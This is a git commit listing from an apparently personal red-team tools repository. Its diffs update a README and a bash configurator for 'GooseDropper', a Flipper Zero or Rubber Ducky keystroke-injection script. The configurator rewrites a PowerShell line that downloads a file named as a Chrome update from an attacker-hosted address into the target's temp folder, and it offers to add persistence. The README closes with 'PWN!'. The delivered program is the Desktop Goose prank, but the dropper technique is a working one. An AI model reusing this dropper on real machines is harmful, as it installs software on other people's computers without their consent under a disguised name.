5 Commits

Author SHA1 Message Date
Malachi 97f37c42db Merge branch 'master' into GooseDropper_V2.0 2023-10-31 15:46:13 -06:00
Malachi 300a0bb90b Update README.md 2023-10-29 01:39:55 -06:00
Malachi dc39957706 Update README.md 2023-10-29 01:36:44 -06:00
Malachi 3ddebfa818 Update README.md 2023-10-29 01:30:25 -06:00
Malachi f7ea353e8e Create README.md 2023-10-29 01:29:06 -06:00
3 changed files with 19 additions and 20 deletions
+2 -1
View File
@@ -4,6 +4,8 @@ This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose
------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------
Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually:
1) Replace the YOUR_IP value in GooseDropper.txt with your IP.
@@ -19,7 +21,6 @@ Currently there is no auto-configurator for Windows but it's in the works. Steps
6) Copy to your Flipper or Rubber-Ducky and PWN!
--------------------------------------------------------------------------------------------------------------
**Important Notes:**
Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
+2 -10
View File
@@ -21,9 +21,9 @@ elif [ "${DL}" == "2" ];
then
#Get your URL
read -p "Enter your URL: " SRC
SRC="$(echo "$SRC" | sed 's/\//\\\//g')"
#Add your URL to the payload
sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
#Remind users to have the zip ready
echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
@@ -36,14 +36,9 @@ else
fi
read -p "Create ZIP file to deliver Desktop Goose? [Y/N]: " COMP
#Check if Desktop Goose is present in this directory
GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
if [ "${COMP,,}" == "y" ];
then
if [ "${GOOSE}" == "" ];
then
echo "Desktop Goose is not present in this directory, download it, or move it here"
@@ -57,9 +52,6 @@ then
rm -rf "Desktop Goose v0.31"* Update
clear
fi
else
break
fi
read -p "Configure Persistence? [Y/N]: " PERSIST
+6
View File
@@ -0,0 +1,6 @@
# Misadventures
This is a set of Red and Purple team tools I've developed, mostly just for fun, but some may find them useful.
Feel free to leave tips, comments, or suggestion in the comments, on my website at https://fr3ki.xyz or my twitter @Fr3ki_
Licence: https://www.gnu.org/licenses/gpl-3.0.html